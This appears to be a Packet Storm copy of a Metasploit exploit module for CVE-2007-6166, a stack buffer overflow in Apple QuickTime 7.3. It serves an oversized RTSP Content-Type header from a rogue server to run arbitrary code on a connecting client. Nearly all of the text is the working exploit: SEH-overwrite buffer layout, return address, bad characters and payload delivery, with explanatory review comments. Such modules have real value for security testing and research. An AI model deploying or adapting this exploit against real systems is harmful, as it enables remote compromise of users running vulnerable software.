
Apple QuickTime 7.3 RTSP Response Header Buffer Overflow

2009-11-2600:00:00
MC
packetstormsecurity.com

0.972 High

EPSS

Percentile

99.8%

`##  
# $Id$  
##  
  
##  
# This file is part of the Metasploit Framework and may be subject to   
# redistribution and commercial restrictions. Please see the Metasploit  
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/  
##  
  
  
  
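class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::TcpServer

  # Module metadata and options.
  #
  # The module acts as a rogue RTSP server: a client (QuickTime 7.3) connects,
  # sends a request, and receives a 200 OK response whose Content-Type header
  # value is oversized. That header value carries the overflow buffer.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Apple QuickTime 7.3 RTSP Response Header Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack overflow in Apple QuickTime 7.3. By sending an overly long
        RTSP response to a client, an attacker may be able to execute arbitrary code.
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'Version'        => '$Revision$',
      'References'     =>
        [
          [ 'CVE', '2007-6166' ],
          [ 'OSVDB', '40876' ],
          [ 'BID', '26549' ],
          [ 'URL', 'http://milw0rm.com/exploits/4648' ],
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          # 700 bytes of encoded payload sit inside the 4092-byte region that
          # on_client_connect appends after the handler address.
          'Space'           => 700,
          # The buffer is sent as an RTSP header value, so bytes that terminate or
          # delimit a header/URI (NUL, tab, CR, LF, space, quotes, % & ' + / : < > ? @)
          # must not appear in the encoded payload.
          'BadChars'        => "\x00\x09\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
          'MaxNops'         => 0,
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # 'Ret' is a pop esi; pop ebx; ret gadget in QuickTimeStreaming.qtx (7.3.0.70).
          # Together with the jmp-short/nops/handler layout built in on_client_connect
          # this is consistent with an SEH handler overwrite rather than a direct EIP hijack.
          [ 'QuickTime 7.3, QuickTime Player 7.3', { 'Offset' => 991, 'Ret' => 0x67644297 } ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => 'Nov 23 2007',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptPort.new('SRVPORT', [ true, "The RTSP daemon port to listen on", 554 ])
      ], self.class)
  end

  # Serve one malicious RTSP response to a connecting client, then hand the
  # connection to the payload handler.
  #
  # client - the accepted client socket (get_once/put/peerhost/peerport are used).
  # Returns nil early if the payload cannot be regenerated for this client.
  def on_client_connect(client)
    # Regenerate the payload for this connection; give up silently if that fails.
    # The encoded bytes are read back via payload.encoded below.
    return if regenerate_payload(client).nil?

    # Read and discard whatever request the client sent; its content is not inspected.
    client.get_once

    # Overflow layout, consistent with a classic SEH overwrite:
    #   [Offset filler][jmp short +6 ; 2 nops][pop/pop/ret address][payload][filler]
    # The 2-byte short jump skips the two nops and the 4-byte handler address and
    # lands on the first byte of the encoded payload.
    buffer = rand_text_english(target['Offset'])
    buffer << Rex::Arch::X86.jmp_short(6)
    buffer << make_nops(2)
    buffer << [target.ret].pack('V')
    buffer << payload.encoded
    # Keep the region after the handler address at a fixed 4092 bytes regardless
    # of the encoded payload length (Space is capped at 700, so this stays positive).
    buffer << rand_text_english(4092 - payload.encoded.length)

    strname = rand_text_alpha(rand(75) + 1)
    # NOTE(review): Time#to_s is not the RFC 1123 date format RTSP/HTTP specify;
    # the target evidently does not care, so it is left as-is.
    date = Time.now
    # SDP requires the protocol version line "v=0", so this is a constant. The
    # previous rand(1).to_s could only ever produce "0" anyway; spell it out.
    num = '0'

    header =  "RTSP/1.0 200 OK\r\n"
    header << "CSeq: 1\r\n"
    header << "Date: #{date}\r\n"
    header << "Content-Base: rtsp://0.0.0.0/#{strname}\r\n"
    # The oversized Content-Type value is the trigger.
    header << "Content-Type: #{buffer}\r\n"
    # NOTE(review): this advertises strname.length, not the real SDP body length.
    # Presumably the overflow fires while headers are parsed, so the mismatch is
    # harmless; left unchanged to keep the tested wire format.
    header << "Content-Length: #{strname.length}\r\n\r\n"

    # Minimal SDP body; every field is random filler except the version/time values.
    sdp_lines = [
      "v=#{num}",
      "o=#{strname}",
      "s=#{strname}",
      "i=#{strname}",
      "t=#{num}",
      "a=tool:#{strname}",
      "a=type:#{strname}",
      "a=control:#{strname}",
      "a=range:#{strname}",
      "a=x-qt-text-nam:#{strname}",
      "a=x-qt-text-inf:#{strname}",
      "m=#{strname}",
      "c=#{strname}",
      "a=control:#{strname}",
    ]
    body = sdp_lines.map { |line| "#{line}\r\n" }.join

    sploit = header + body

    print_status("Sending #{sploit.length} bytes to #{client.peerhost}:#{client.peerport}...")

    client.put(sploit)
    handler(client)

    service.close_client(client)
  end

end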
`